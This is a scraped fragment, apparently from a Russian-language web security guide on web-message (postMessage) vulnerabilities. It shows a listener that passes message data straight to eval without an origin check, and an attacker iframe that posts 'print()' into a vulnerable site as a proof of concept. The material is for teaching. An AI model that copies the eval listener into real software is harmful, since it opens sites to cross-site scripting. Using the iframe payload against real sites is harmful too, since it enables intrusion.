Web messages
Каковы последствия уязвимостей веб‑сообщений?
Как сконструировать атаку, используя веб‑сообщения в качестве источника
<script>
window.addEventListener('message', function(e) {
eval(e.data);
});
</script><iframe src="//vulnerable-website" onload="this.contentWindow.postMessage('print()','*')">Проверка origin
Какие приёмники могут привести к уязвимостям веб‑сообщений?
Last updated